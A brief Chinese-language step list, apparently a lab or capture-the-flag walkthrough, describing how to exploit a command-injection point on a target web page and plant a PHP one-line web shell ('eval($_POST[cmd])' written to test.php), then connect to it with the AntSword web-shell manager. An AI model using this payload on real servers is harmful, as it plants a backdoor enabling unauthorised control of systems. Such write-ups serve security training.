一、扫描目标主机地址 二、一个一个点击页面中能点击的地方 三、输入ID会发现有回显 四、输入一句话木马 echo'<?php eval($_POST[cmd]);?>' > test.php 五、输入ls查看文件 六、打开蚁剑直接连接成功,即可进入